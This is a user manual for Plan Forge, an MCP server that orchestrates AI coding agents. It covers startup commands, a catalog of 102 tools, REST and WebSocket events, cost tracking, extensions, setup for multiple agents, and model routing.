📚 Plan Forge Manual

Quick Start

Starting the server, VS Code auto-start, and the essential tools every Forge user needs: forge_capabilities, forge_run_plan, forge_plan_status, forge_smith, and more.

Full Reference

Complete tool tables for all 8 categories (102 tools), REST API endpoints, WebSocket hub events, OTLP telemetry, cost tracking, SDK, and API key configuration.

Discovery first: Call forge_capabilities before anything else. It returns the full live API surface, including tool schemas, config options, available extensions, and per-tool error codes, and it is always authoritative.

📄 Full reference: capabilities, EVENTS.md on GitHub, tools.json on GitHub

Chapter 11 · Quick Start

MCP Server — Quick Start

Start the server, verify it's running, and call your first forge tools in under five minutes.

New to this chapter? Start at Chapter 11 — MCP Server & Tools for the architecture overview, then return here to get hands-on. The Full Reference has the complete tool tables and REST API.

Starting the Server

Terminal

# Install dependencies (first time only)
cd pforge-mcp && npm install && cd ..

# Full server: MCP + HTTP + WebSocket
node pforge-mcp/server.mjs

# Dashboard only (no MCP stdio)
node pforge-mcp/server.mjs --dashboard-only

# Custom project path
node pforge-mcp/server.mjs --project /path/to/project

With .vscode/mcp.json configured (created by setup.ps1 / setup.sh), the server auto-starts when Copilot calls any forge tool; you don't need to start it manually.

Verify It's Running

Terminal

# Check the health endpoint
curl http://localhost:3100/api/status

# Or open the dashboard in your browser (macOS; use xdg-open on Linux or start on Windows)
open http://localhost:3100

Essential Tools

These are the tools you'll use most often. Start with forge_capabilities to discover the full surface; use forge_run_plan to execute your work.

Discovery first: Always call forge_capabilities at the start of a session. It returns the live API surface, including tool schemas, config options, extensions, and per-tool error codes.

forge_capabilities — Discovery

Returns the complete, always-authoritative API surface. Call this first.

Copilot Chat

forge_capabilities({})

Returns: tool schemas, intents, config keys, available extensions, per-tool error codes.

forge_smith — Environment Check

Diagnose your setup: VS Code config, Node version, MCP connectivity, preset health, version currency. Run this when something isn't working.

Copilot Chat

forge_smith({})

forge_run_plan — Execute a Plan

Execute a hardened plan file. Spawns workers, validates gates after each slice, tracks tokens and cost. This is the core execution command.

Copilot Chat

// Estimate cost before running (recommended)
forge_run_plan({ plan: "docs/plans/Phase-1.md", estimate: true })

// Execute
forge_run_plan({ plan: "docs/plans/Phase-1.md" })

// Execute with quorum mode
forge_run_plan({ plan: "docs/plans/Phase-1.md", quorum: "auto" })

// Resume from a specific slice
forge_run_plan({ plan: "docs/plans/Phase-1.md", resumeFrom: 3 })

Quorum modes: auto (adaptive), power (flagship models, threshold 5), speed (fast models, threshold 7), false (single model, no quorum).

forge_plan_status — Execution Status

Poll the status of the currently running (or most recent) plan execution. Returns per-slice results, tokens consumed, duration, and gate outcomes.

Copilot Chat

forge_plan_status({})

forge_abort — Stop Execution

Abort the currently running plan execution. The orchestrator finishes the current slice's work-in-progress before stopping.

Copilot Chat

forge_abort({})

forge_diagnose — Bug Investigation

Multi-model bug investigation: provide a source file (and optionally models) and receive root-cause analysis plus fix recommendations.

Copilot Chat

forge_diagnose({ file: "src/services/billing.ts" })

forge_analyze — Consistency Scoring

Cross-artifact consistency scoring (0–100 across 4 dimensions). Checks that your plans, code, tests, and docs are in sync. Run before shipping. The plan parameter is required and can point at a plan Markdown file or a source file.

Copilot Chat

forge_analyze({ plan: "docs/plans/Phase-1-AUTH-PLAN.md" })

forge_estimate_quorum — Cost Preview

Project the cost of a plan under all four quorum modes before executing. Always call this instead of hand-computing costs.

Copilot Chat

forge_estimate_quorum({ planPath: "docs/plans/Phase-1.md" })

Typical Workflow

1. Discover: forge_capabilities({}) to see the live API surface
2. Check setup: forge_smith({}) to confirm everything is green
3. Estimate: forge_estimate_quorum({ planPath: "…" }) before any execution
4. Run: forge_run_plan({ plan: "…" }) to execute your plan
5. Monitor: forge_plan_status({}) to track progress
6. Review: forge_analyze({ plan: "…" }) to confirm artifact consistency
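
The six steps above can be sketched as a short script. This is an illustrative sketch, not part of Plan Forge: `runWorkflow` and the injected `callTool` function are hypothetical names, and the arguments simply mirror the examples in this chapter. In practice `callTool` would wrap whichever MCP client or REST call you already use.

```javascript
// Hypothetical helper: runs the Quick Start workflow in order.
// `callTool(name, args)` is supplied by the caller and must return a promise.
async function runWorkflow(callTool, planPath) {
  const steps = [
    ["forge_capabilities", {}],
    ["forge_smith", {}],
    ["forge_estimate_quorum", { planPath }],
    ["forge_run_plan", { plan: planPath }],
    ["forge_plan_status", {}],
    ["forge_analyze", { plan: planPath }],
  ];
  const results = [];
  for (const [name, args] of steps) {
    // Awaiting each call means a rejected step stops the workflow
    // before the next tool is invoked.
    results.push({ name, result: await callTool(name, args) });
  }
  return results;
}
```

Running the steps sequentially keeps the estimate ahead of the execution, which is the ordering the workflow recommends.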

Need the full tool list? See MCP Server — Full Reference for all 102 tools across 8 categories, REST API endpoints, WebSocket events, telemetry, cost tracking, SDK, and API key configuration.

Chapter 11 · Full Reference

MCP Server — Full Reference

Complete tool tables for all 102 MCP tools across 8 categories, REST API endpoints, WebSocket hub events, OTLP telemetry, cost tracking, SDK, and API key configuration.

Just getting started? See MCP Server — Quick Start for the essential tools and a typical workflow. Return here when you need the full catalog or REST API details.

MCP Tools (102, in 8 Categories)

Every tool is callable from Copilot Chat, Claude Code, Cursor, or any MCP-compatible client. Tools are grouped by station / subsystem. The four "station" categories (Crucible, LiveGuard, Tempering, Bug Registry / Testbed) map directly to the four shop stations; the rest are cross-cutting infrastructure.

Core — Execution, Diagnosis, Skills, Cost, Memory (37 tools)

Everything that powers the Smelt and Forge stations plus the cross-cutting surfaces (skills, memory, cost, search, review queue, notifications, image generation, meta-bug filing).

Tool	Description
Diagnostics & setup
`forge_smith`	Diagnose environment, VS Code config, setup health, version currency. The "shop inspector."
`forge_validate`	Validate setup files, check counts match preset, no placeholders
`forge_sweep`	Scan for TODO/FIXME/HACK/stub/placeholder markers
`forge_capabilities`	Machine-readable API surface: tools, intents, config, extensions, error codes
`forge_status`	Show phases from `DEPLOYMENT-ROADMAP.md` with status
Plan execution (Forge station)
`forge_run_plan`	Execute a hardened plan: spawn workers, validate gates, track tokens. Supports `--quorum=auto|power|speed|false`
`forge_abort`	Abort the currently running plan execution
`forge_plan_status`	Latest execution status: per-slice results, tokens, duration
`forge_diff`	Compare changes against the plan's Scope Contract to detect drift
`forge_new_phase`	Create a new phase plan file + roadmap entry
Analysis & estimation
`forge_analyze`	Cross-artifact consistency scoring (0–100, 4 dimensions)
`forge_diagnose`	Multi-model bug investigation: root cause + fix recommendations
`forge_estimate_quorum`	Projected cost of a plan under all four quorum modes (auto/power/speed/false). Always call this before showing cost estimates; never hand-compute.
`forge_estimate_slice`	Per-slice cost estimate with confidence (heuristic vs historical)
`forge_doctor_quorum`	Diagnose quorum-mode availability and routing issues
`forge_graph_query`	Query the Plan Forge knowledge graph (built post-Slice via `postSlice` hook)
`forge_search`	Cross-artifact search across plans, runs, bugs, memory
Cost & performance
`forge_cost_report`	Cost tracking: total spend, per-model breakdown, monthly trend. Authoritative source for actual spend.
`forge_timeline`	Unified chronological view of runs, incidents, bugs, deploys, fm-turns, crucible events. 9 sources.
`forge_home_snapshot`	Snapshot of the “home” dashboard tile state (the aggregate health surface)
Skills & review
`forge_run_skill`	Execute a skill programmatically with step-level tracking
`forge_skill_status`	Recent skill execution events from the hub
`forge_review_add`	Queue a review item (used by Step 5 reviewer agents)
`forge_review_list`	List open / resolved review items
`forge_review_resolve`	Resolve a review item with verdict + notes
`forge_patterns_list`	List captured architectural patterns for a project
Memory (Learn station bridge)
`forge_memory_capture`	Normalise and broadcast a `memory-captured` hub event for OpenBrain
`forge_memory_report`	Aggregate report of recent captures, patterns, decisions
Notifications & bridge
`forge_notify_send`	Send a notification via the configured Remote Bridge (Slack / Teams / PagerDuty / OpenClaw / Telegram / Discord)
`forge_notify_test`	Test the Remote Bridge configuration end-to-end
`forge_delegate_to_agent`	Hand a sub-task to a specific reviewer agent in multi-agent mode
Extensions & meta
`forge_ext_search`	Search the community extension catalog
`forge_ext_info`	Detailed info about a specific extension
`forge_org_rules`	Export org custom instructions: consolidates instruction files for GitHub org-level Copilot config
`forge_meta_bug_file`	File a self-repair bug against Plan Forge itself (plan-defect / orchestrator-defect / prompt-defect)
`forge_triage_route`	Route a finding to the appropriate lane (bug / spec / classifier); powers the audit-loop drain
`forge_generate_image`	Generate images via Grok Aurora or DALL-E, save with format conversion

LiveGuard — Post-Ship Defense (14 tools)

The Guard station. Detect drift, capture incidents, watch dependencies, scan for secrets, propose fixes, all running against shipped code. Chapter 17 — LiveGuard Tools Reference covers each one in depth (flags, thresholds, output shapes, severity matrix). Listed here for completeness.

Tool	Description
`forge_liveguard_run`	Composite scan: drift + sweep + secrets + regression + deps + alerts + health. The "everything" command.
`forge_drift_report`	Score codebase against architecture guardrail rules; track drift over time
`forge_secret_scan`	High-entropy secret detection; values are always redacted
`forge_dep_watch`	Scan dependencies for CVEs; alert on new vulnerabilities
`forge_regression_guard`	Extract validation gates from plans, execute against codebase
`forge_incident_capture`	Record incidents with severity, affected files, MTTR tracking
`forge_alert_triage`	Read incidents and drift violations, rank by priority
`forge_env_diff`	Environment variable key divergence across `.env` files
`forge_fix_proposal`	Generate scoped 1–2 slice fix plan from a regression / drift / incident finding
`forge_health_trend`	Aggregate drift, cost, incidents, model performance into health score 0–100
`forge_hotspot`	Identify git-churn hotspots (the files that change most frequently)
`forge_runbook`	Generate an operational runbook from a hardened plan file
`forge_deploy_journal`	Record deployments with version, deployer, notes
`forge_quorum_analyze`	Assemble a structured quorum prompt from LiveGuard data; makes no LLM calls

Watcher — Cross-Project Read-Only Tail (2 tools)

Read-only observation of another project's forge run from a second VS Code session. See Chapter 19 — The Watcher.

Tool	Description
`forge_watch`	Snapshot or analyze (claude-opus-4.7) mode. Returns counts, anomalies, recommendations, diff cursor.
`forge_watch_live`	Live tail: streams events for a fixed duration via the target's WebSocket hub or events.log polling.

Crucible — Idea Smelting (8 tools)

The Smelt station. Interview-driven plan intake with a critical-fields gate that refuses to finalize until build-command, test-command, scope, gates, and forbidden-actions are all satisfied. Includes a deterministic Spec Kit importer. See Chapter 5 — Crucible.

Tool	Description
`forge_crucible_submit`	Submit a raw idea or feature request to start an interview
`forge_crucible_ask`	Answer the next interview question. Supports an optional `questionId` to refuse on out-of-sync clients with `ASK_QUESTION_MISMATCH`.
`forge_crucible_preview`	Preview the draft plan + flag any unresolved CRITICAL_FIELDS
`forge_crucible_finalize`	Finalize into `docs/plans/Phase-NN.md`. Refuses if plan exists with `PLAN_ALREADY_EXISTS`; pass `overwrite: true` to bypass. Refuses on missing CRITICAL_FIELDS with `CRITICAL_FIELDS_MISSING`.
`forge_crucible_list`	List all in-flight and finalized smelts
`forge_crucible_abandon`	Abandon an in-flight smelt
`forge_crucible_import`	Deterministic Spec Kit importer. Maps a Spec Kit checkout (`spec.md` + `plan.md` + `tasks.md` + optional `constitution.md`) into a Plan Forge smelt under `.forge/crucible/`. No LLM calls. Supports `--dry-run` and `--json`.
`forge_crucible_status`	Inspect imported smelts. Lists all smelts when called without an id, or returns the full smelt record (metadata + draft plan) when given a smelt id.

Tempering — Quality Drains & Audit Loop (5 tools)

Closed-loop self-tempering: scan, triage, fix, and repeat until convergence. The audit-loop drain is opt-in via the audit.mode setting in .forge.json, which accepts "off", "auto", or "always". See Audit Loop Deep Dive.

Tool	Description
`forge_tempering_scan`	Run a single tempering scanner (mutation, content-audit, etc.)
`forge_tempering_run`	Run the full standard scanner sequence (10 scanners)
`forge_tempering_drain`	Iterate scan → triage → fix until convergence or `maxRounds`
`forge_tempering_status`	Latest tempering run status: scanners, findings
`forge_tempering_approve_baseline`	Approve current findings as the new baseline for visual-diff scanners

Bug Registry — Closed-Loop Bug Lifecycle (4 tools)

The Learn station. Fingerprint-deduped bug registry: register, fix, validate, remember. See Chapter 23 — The Bug Registry.

Tool	Description
`forge_bug_register`	Register a new bug with title, severity, fingerprint inputs, file paths
`forge_bug_list`	List bugs by status, severity, or fingerprint match
`forge_bug_update_status`	Update status (open / in-progress / fixed / verified / closed). Accepts both `newStatus` and `status`.
`forge_bug_validate_fix`	Run the bug's validation gate against the current codebase to confirm a fix landed

Testbed — Scenario Replay (3 tools)

Replay scenarios against a dedicated fixture repo (typically plan-forge-testbed/) to prove fixes don't regress. See Chapter 24 — The Testbed.

Tool	Description
`forge_testbed_run`	Execute a scenario against the testbed fixture
`forge_testbed_happypath`	Run the happy-path scenario set as a smoke test
`forge_testbed_findings`	Aggregate findings from the latest testbed run

Forge-Master — Read-Only Reasoning Orchestrator (1 MCP tool + REST surface)

Intent classifier with embedding cache and quorum advisory mode. Classifies open-ended prompts, fetches OpenBrain memory, and chains read-only forge tools on your behalf. The bulk of the Forge-Master surface is exposed via /api/forge-master/* REST routes (see below) plus the dashboard's Studio tab; only the one-shot reasoning entry-point is an MCP tool.

Tool	Description
`forge_master_ask`	One-shot reasoning entry point. Accepts a free-form message; returns lane classification, tool-call trace, and synthesized reply. Use for open-ended questions instead of chaining tools yourself.

Forge-Master chapter: covers the three-stage intent classifier (keyword → embedding cache → router LLM), quorum advisory mode for high-stakes decisions, and the /api/forge-master/cache-stats liveness endpoint.

REST API

The REST surface is documented in full in Appendix W (REST API Reference): every endpoint, request/response shape, status codes, authentication model, and worked examples. The summary below points at the most-used subsystems; click through to Appendix W for the per-endpoint detail.

Subsystem	What it covers
Discovery	Liveness, version, capability manifest, well-known endpoint.
Plan execution & runs	Trigger/abort runs, traces, replay, plans, workers.
Search, timeline, hub	Cross-surface search, unified timeline, WebSocket upgrade.
Memory	Capture, drain, search, OpenBrain stats.
Crucible	Idea-smelt lifecycle: `submit → ask → preview → finalize`.
LiveGuard	Drift, incidents, deploy journal, regression guard, runbooks, secret scan, dep watch.
Bridge & approvals	The only cross-boundary auth surface (HMAC via `PFORGE_BRIDGE_SECRET`).
Forge-Master	Conversational entrypoint: chat, prefs, cache stats.
Generic MCP dispatcher	`POST /api/tool/:name`, which invokes any of the 102 MCP tools over REST.

Trust model: the server binds to 127.0.0.1 only and has no authentication layer of its own; the OS user account is the access boundary. The only exception is the bridge approval surface, which is HMAC-protected. See Appendix W — Authentication, binding, and CORS for the full discussion.
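
As a rough illustration of the generic dispatcher, the helper below builds a request for `POST /api/tool/:name`. It is a sketch under stated assumptions: `buildToolRequest` is a hypothetical name, and sending the tool arguments as a JSON body is a guess at the request shape, so confirm it against Appendix W before relying on it.

```javascript
// Builds a fetch() request for the generic dispatcher, POST /api/tool/:name.
// Assumption: tool arguments travel as a JSON body; Appendix W has the real shape.
function buildToolRequest(name, args = {}, baseUrl = "http://localhost:3100") {
  return {
    url: `${baseUrl}/api/tool/${encodeURIComponent(name)}`,
    init: {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify(args),
    },
  };
}

// Usage, inside an async function:
//   const { url, init } = buildToolRequest("forge_smith");
//   const response = await fetch(url, init);
```

Because the server binds to 127.0.0.1 with no authentication layer of its own, the sketch sends no credentials.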

WebSocket Hub

Connect to ws://localhost:3101 for real-time events. The dashboard uses this for live progress updates.

Event	When
`connected`	Client connects; includes event history replay
`run-started`	Plan execution begins
`slice-started`	Slice begins execution
`slice-completed`	Slice passes all validation gates
`slice-failed`	Slice or gate fails
`slice-escalated`	Slice escalated to quorum for multi-model consensus
`run-completed`	All slices finish
`run-aborted`	Execution aborted via `forge_abort`
`skill-started`	Skill execution begins
`skill-completed`	Skill finishes all steps
`approval-requested`	Bridge pauses for external approval
`bridge-notification-sent`	Webhook dispatched (Telegram, Slack, Discord)
`watch-snapshot-completed`	Watcher built a snapshot of a target project
`watch-anomaly-detected`	Watcher detected one or more anomalies (stalled, slice-failed, quorum-dissent, etc.)
`watch-advice-generated`	Watcher analyze-mode produced narrative advice from frontier model
`fm-turn`	Forge-Master turn (intent classification + tool-call trace + reply). Surfaces in the unified Timeline.
`quorum-estimate`	Forge-Master quorum advisory cost estimate, emitted before model dispatch so clients can cancel
`memory-captured`	Decision / pattern / postmortem captured to OpenBrain
`crucible-started` / `crucible-question` / `crucible-finalized`	Crucible interview lifecycle events
`tempering-round-completed`	One round of audit-loop drain finished (scan → triage → fix)
`slice-orphan-warning`	Failed slice's worker deliverables were staged but not committed; recovery commands available
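
A client typically folds these events into a running summary. The reducer below is a minimal sketch of that idea. It assumes each hub message parses to an object whose `type` field is one of the event names in the table; that payload shape, along with the names `applyEvent` and `initialState`, is an assumption rather than something the catalog confirms.

```javascript
// Folds hub events into a run summary.
// Assumption: each message is an object whose `type` is an event name from the table.
function applyEvent(state, event) {
  switch (event.type) {
    case "run-started":
      return { status: "running", completed: 0, failed: 0, escalated: 0 };
    case "slice-completed":
      return { ...state, completed: state.completed + 1 };
    case "slice-failed":
      return { ...state, failed: state.failed + 1 };
    case "slice-escalated":
      return { ...state, escalated: state.escalated + 1 };
    case "run-completed":
      return { ...state, status: "completed" };
    case "run-aborted":
      return { ...state, status: "aborted" };
    default:
      return state; // events this summary does not track are ignored
  }
}

const initialState = { status: "idle", completed: 0, failed: 0, escalated: 0 };
```

With a WebSocket client connected to ws://localhost:3101, each incoming message would be parsed and passed through `applyEvent` to keep the summary current.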

Telemetry

Every plan execution emits OpenTelemetry (OTLP) traces stored in .forge/runs/<timestamp>/traces.json:

Resource context: project name, version, preset, model
Span hierarchy: run → slice → gate → escalation
Severity levels: INFO for passes, WARN for retries, ERROR for failures
Export: traces are OTLP-compatible; send them to Jaeger, Grafana Tempo, or any collector

Cost Tracking

The orchestrator tracks tokens and computes cost per slice using a 23-model pricing table:

Per-slice: tokens in/out, model, duration, USD cost
Per-run: total cost, model breakdown
Monthly: aggregated in .forge/cost-history.json
Model performance: .forge/model-performance.json tracks success rate, avg cost, and avg duration per model

The orchestrator auto-selects the cheapest model with >80% historical pass rate. Use --estimate to preview costs before executing.
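
The selection rule can be illustrated with a short function. This is a sketch of the stated rule only, not the orchestrator's code: the function name and the `successRate` / `avgCost` field names are assumptions, and the real layout of .forge/model-performance.json may differ.

```javascript
// Picks the cheapest model whose historical pass rate exceeds the cutoff.
// Assumption: `stats` maps model name -> { successRate (0..1), avgCost (USD) }.
function pickCheapestReliable(stats, minPassRate = 0.8) {
  const eligible = Object.entries(stats)
    .filter(([, s]) => s.successRate > minPassRate)
    .sort(([, a], [, b]) => a.avgCost - b.avgCost);
  // Returns null when no model clears the cutoff, leaving the fallback to the caller.
  return eligible.length > 0 ? eligible[0][0] : null;
}
```

The comparison is strict, so a model at exactly 80% is excluded, matching the ">80%" wording.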

SDK for Integrators

The pforge-sdk/ package provides a JavaScript/TypeScript API for building integrations:

JavaScript

import { createForgeClient } from 'pforge-sdk';

const forge = createForgeClient({ baseUrl: 'http://localhost:3100' });

// Run smith diagnostics
const health = await forge.smith();

// Get cost report
const cost = await forge.costReport();

// Execute a plan
const run = await forge.runPlan('docs/plans/Phase-1.md', {
  mode: 'estimate'
});

The SDK is currently at the scaffold stage (v0.1.0): the API surface is defined and the implementation is in progress.

API Key Configuration

API keys for external providers (xAI Grok, OpenAI) are resolved in order: environment variable → .forge/secrets.json → null.

.forge/secrets.json

{
  "XAI_API_KEY": "xai-...",
  "OPENAI_API_KEY": "sk-..."
}

The .forge/ directory is gitignored by default, so secrets stay out of version control.
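
The resolution order (environment variable → .forge/secrets.json → null) can be sketched as a pure function. `resolveApiKey` is a hypothetical name, and the sketch assumes the caller has already read and parsed the secrets file, passing `{}` when it is absent.

```javascript
// Resolves a provider key: environment variable first, then the secrets file, then null.
// `secrets` is the already-parsed contents of .forge/secrets.json ({} if the file is absent).
function resolveApiKey(name, env, secrets) {
  if (env[name]) return env[name];
  if (secrets[name]) return secrets[name];
  return null;
}

// Usage: resolveApiKey("XAI_API_KEY", process.env, parsedSecrets)
```

Taking `env` and `secrets` as parameters keeps the lookup order easy to verify without touching the real environment.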

📄 Full reference: capabilities, Appendix V — Event Catalog (every WebSocket event grouped by family), EVENTS.md on GitHub, tools.json on GitHub

Chapter 12

Extensions

Install, create, and publish guardrail extensions.

What Extensions Add

Extensions are packaged bundles of instruction files, agents, and prompts that add domain-specific guardrails to your project. They give you drop-in expertise for domains you haven't solved yet: instead of writing compliance rules from scratch, install a community extension and get pre-built knowledge.

Browsing the Catalog

Terminal

# Browse all extensions
pforge ext search

# Filter by keyword
pforge ext search compliance

# Get details about a specific extension
pforge ext info saas-multi-tenancy

The catalog is also browsable in the Dashboard Extensions tab.

Featured Extensions

Extension	Category	What It Adds
`saas-multi-tenancy`	Architecture	Tenant isolation patterns, RLS enforcement, cache separation, cross-tenant audit
`azure-infrastructure`	Cloud	Bicep/Terraform guardrails, resource naming, tagging, cost governance
`plan-forge-memory`	Integration	OpenBrain memory, persistent context across sessions, postmortem injection

Installing an Extension

Terminal

# One-step install from catalog
pforge ext add saas-multi-tenancy

# Install from local path
pforge ext install .forge/extensions/my-extension

This copies instruction files to .github/instructions/, agents to .github/agents/, and prompts to .github/prompts/. The extension metadata is tracked in .forge/extensions/.
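
The copy rules can be pictured as a lookup from extension subfolder to destination. This is an illustrative sketch, not the installer's implementation: `installTarget` is a hypothetical name, and returning `null` for files outside the three folders (such as the manifest) is an assumption.

```javascript
// Maps extension subfolders to the destinations named in the paragraph above.
const DESTINATIONS = new Map([
  ["instructions", ".github/instructions/"],
  ["agents", ".github/agents/"],
  ["prompts", ".github/prompts/"],
]);

// `relativePath` is relative to the extension root,
// for example "agents/hipaa-reviewer.agent.md".
function installTarget(relativePath) {
  const [folder, ...rest] = relativePath.split("/");
  const dest = DESTINATIONS.get(folder);
  // Assumption: anything outside the three known folders is not copied.
  if (!dest || rest.length === 0) return null;
  return dest + rest.join("/");
}
```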

Creating Your Own Extension

Create directory: .forge/extensions/my-extension/

Add extension.json manifest:

extension.json

{
  "name": "my-extension",
  "version": "1.0.0",
  "description": "Domain-specific guardrails for healthcare",
  "author": "your-name",
  "category": "compliance"
}

Add guardrail files:

Extension structure

my-extension/
├── extension.json
├── instructions/
│   ├── hipaa-compliance.instructions.md
│   └── phi-handling.instructions.md
├── agents/
│   └── hipaa-reviewer.agent.md
└── prompts/
    └── compliance-audit.prompt.md

Test locally: pforge ext install .forge/extensions/my-extension
Publish: pforge ext publish .forge/extensions/my-extension

Publishing

Publishing generates a catalog entry; it doesn't upload anything. You submit via pull request:

1. Run pforge ext publish .forge/extensions/my-extension
2. Fork plan-forge on GitHub
3. Add the generated entry to extensions/catalog.json
4. Open a PR with title: feat(catalog): add my-extension

Spec Kit compatible: pforge ext publish outputs both a Plan Forge catalog entry and a Spec Kit-compatible extensions.json entry in one command.

Managing Extensions

Terminal

# List installed extensions
pforge ext list

# Remove an extension
pforge ext remove healthcare-compliance

📄 Full reference: Extensions guide, PUBLISHING.md on GitHub

Chapter 13

Multi-Agent Setup

One setup, all agents. Configure Plan Forge for 7 AI tools.

New here? What this chapter is about. Plan Forge isn't tied to one AI tool. Whatever you or your team already use (GitHub Copilot, Claude Code, Cursor, Codex, Gemini, or Windsurf), the same plans, instructions, and reviewer agents work in all of them. This chapter shows how to install the right files for each tool. You don't need all of them; just pick the agent(s) your team uses.

What gets installed: native config files for each agent (e.g. CLAUDE.md, .cursorrules, AGENTS.md) so the agent reads Plan Forge's guardrails automatically.
Why it matters: you get the same architecture rules, same reviewers, and same skills, no matter which AI you're talking to. Switching tools doesn't mean re-teaching the rules.
Default: GitHub Copilot files always install (Plan Forge's reference implementation). Add others with the -Agent flag.

Read this first if you haven't: the orchestration concepts this chapter assumes (intent lanes, quorum advisory, and the Forge-Master reasoning UI) are introduced in the Forge-Master (Deep Dive) sub-chapter and exposed on the Forge-Master tab of the Dashboard. If those terms are new, skim either before wiring in a second agent.

One Setup, All Agents

Terminal

# Add all agent adapters at once
.\setup.ps1 -Preset dotnet -Agent all

# Or pick specific agents
.\setup.ps1 -Preset dotnet -Agent claude,cursor

Copilot files are always installed. The -Agent flag adds native files for other tools, each with all 16 guardrail files embedded, prompts as native skills/commands, and 19 reviewer agents as invocable procedures.

Feature Parity Matrix

Feature	Copilot	Claude	Cursor	Codex	Gemini	Windsurf	Generic
Auto-loading instructions	✓ Native	✓ Emulated	✓ Emulated	⚠ Manual	✓ Emulated	✓ Emulated	✗
Pipeline agents	✓ 6	✓ Skills	✓ Commands	✓ Skills	✓ Commands	✓ Workflows	✗
Reviewer agents	✓ 19	✓ 19	✓ 19	✓ 19	✓ 19	✓ 19	✗
MCP tools	✓	✓	✓	⚠ Partial	⚠ Partial	⚠ Partial	✗
Full Auto execution	✓	✓	✓	✓	⚠	✓	✗
Lifecycle hooks	✓	✓ Emulated	✗	✗	✗	✗	✗
Memory bridge	✓ OpenBrain	✓ Native	⚠	⚠	⚠	⚠	✗

GitHub Copilot (Default)

Native integration. Instruction files auto-load via applyTo. Agents appear in the agent picker. Skills invoke via /slash-command. Hooks run automatically. This is the reference implementation; all other agents emulate this behavior.

Key file: .github/copilot-instructions.md

Claude Code

All guardrails embedded in a single CLAUDE.md file. Claude Code reads this automatically at project root. Includes 33+ skills as slash commands, full auto mode, and memory hooks.

Key file: CLAUDE.md

Setup

.\setup.ps1 -Preset dotnet -Agent claude

Cursor

Rules written to .cursorrules and .cursor/rules/*.mdc. Cursor loads the rules automatically based on file patterns.

Key files: .cursorrules, .cursor/rules/

Codex CLI

Skills as executable scripts in .agents/skills/. Terminal-based execution with all pipeline steps available.

Key file: AGENTS.md

Gemini CLI

Guardrails embedded in GEMINI.md. Commands as .gemini/commands/*.toml files for /planforge-* invocations.

Key files: GEMINI.md, .gemini/commands/

Windsurf

Rules in .windsurfrules and .windsurf/rules/*.md with trigger frontmatter. Workflows mapped to Cascade integration.

Key files: .windsurfrules, .windsurf/rules/

Generic (Any AI Tool)

A single AI-ASSISTANT.md file with copy-paste guardrails. Works with ChatGPT, Ollama, or any tool that accepts text prompts.

Key file: AI-ASSISTANT.md

Cloud Agent

GitHub's Copilot cloud agent uses the same copilot flag; no separate adapter is needed. Add copilot-setup-steps.yml to provision the agent's environment:

Terminal

cp templates/copilot-setup-steps.yml .github/copilot-setup-steps.yml

The cloud agent gets all guardrails, MCP tools, and pforge run-plan automatically.

OpenBrain: The Connective Tissue

Across all seven agents, one challenge remains: each tool starts each session with a blank slate. OpenBrain solves this by acting as a shared, persistent memory layer that every agent reads from and writes to, regardless of which tool authored the thought.

When Claude Code resolves an architectural ambiguity, that decision is captured as a thought. When you switch to Copilot the next morning, it retrieves that thought before writing a single line. When your team's Cursor instance encounters the same pattern, it inherits the same guardrails. The agents change; the institutional knowledge compounds.

How it works at the tool level: the Memory bridge row in the Feature Parity Matrix above shows each agent's integration tier. Copilot and Claude have full native integration; Cursor, Codex, Gemini, and Windsurf use the pforge recall CLI to inject context at session start. The Generic adapter includes copy-paste recall snippets.

For a deep dive into the three-tier memory architecture (in-RAM hub → local JSONL → pgvector semantic index), see Unified Memory Across Agents in Chapter 24.

See also: One Framework, Seven AI Agents, a practical walkthrough of how a mixed-agent team operates on a shared Plan Forge project without knowledge silos.

Spec Kit Interop

If you use Spec Kit for specifications, Plan Forge picks up where your specs end. The setup wizard auto-detects existing Spec Kit files and imports them as context. Extensions marked speckit_compatible work in both frameworks.

📄 Full reference: AGENT-SETUP.md on GitHub

Chapter 14

Advanced Execution

Model routing, quorum mode, cost optimization, CI integration, and resume strategies.

Prerequisite refresher: This chapter assumes you know what slices, gates, and scope contracts are (Chapter 2) and have run at least one plan (Chapter 6). If those terms are unfamiliar, start there.

New here? What this chapter is about. Up until now, you've run plans with default settings: one model, one pass, all slices treated equally. This chapter shows you the dials you can turn to make execution cheaper, smarter, or more reliable. Each section is independent; pick what you need:

Model Routing: assign different AI models to different jobs (a cheap one for grunt work, an expensive one for review).
Escalation Chains: if Model A fails a slice, automatically retry with Model B, then C.
Quorum Mode: have multiple models solve the same slice in parallel and pick the best answer. Higher quality, higher cost.
Cost Optimization & CI Integration: caps, budgets, and running plans inside GitHub Actions.
Resume & Retry: pick up where a failed run left off without redoing finished slices.

Defaults are sensible; you don't need any of this for your first run. Come back when you want to tune.

Model Routing

Same principle as a human team: let the junior do the legwork and the senior do the final check. It costs less and catches more.

Assign different models per role in .forge.json:

.forge.json

{
  "modelRouting": {
    "default": "grok-4",
    "execute": "claude-sonnet-4.6",
    "review": "claude-opus-4.6"
  }
}

Use a fast/cheap model for execution and a more capable model for review. The orchestrator routes each slice to the appropriate model based on its role.

DIRECT_API_ONLY vs COPILOT_SERVABLE (v2.81+)

Models are split into two routing classes that determine how the orchestrator reaches them:

Class	Models	Routing
`DIRECT_API_ONLY`	`grok-`, `dall-e-`	HTTP API only. No CLI proxy exists. Requires `XAI_API_KEY` / `OPENAI_API_KEY`.
`COPILOT_SERVABLE`	`gpt-`, `chatgpt-` (incl. `gpt-5.3-codex`)	Prefers `gh copilot` CLI proxy when available (uses your Copilot subscription). Falls back to direct OpenAI API if `OPENAI_API_KEY` is set.
Everything else	Claude, Gemini, etc.	CLI-first via the matching agent CLI (`claude`, `gemini`, etc.)

This split (Phase-34, fixes #103) means gpt-* models no longer drop from auto-quorum when OPENAI_API_KEY is unset but gh-copilot is installed. The old pattern conflated “requires direct API” with “routed via HTTP” and unfairly penalized Copilot users.
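
The prefix-based split in the table can be sketched as a small classifier. This is an illustration rather than the orchestrator's code: the prefix lists come from the table, while the function name and the `CLI_FIRST` label for the "everything else" row are hypothetical.

```javascript
// Prefix lists taken from the routing-class table.
const DIRECT_API_ONLY = ["grok-", "dall-e-"];
const COPILOT_SERVABLE = ["gpt-", "chatgpt-"];

// Returns the routing class for a model name.
function routingClass(model) {
  if (DIRECT_API_ONLY.some((prefix) => model.startsWith(prefix))) return "DIRECT_API_ONLY";
  if (COPILOT_SERVABLE.some((prefix) => model.startsWith(prefix))) return "COPILOT_SERVABLE";
  return "CLI_FIRST"; // hypothetical label for the "everything else" row
}
```

Keeping the two prefix lists separate is the point of the split: a `gpt-` model is no longer treated as requiring a direct API key.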

